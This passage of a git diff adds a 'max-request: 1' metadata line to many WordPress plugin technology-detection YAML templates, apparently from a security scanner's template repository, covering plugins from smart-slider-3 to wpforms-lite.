+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ 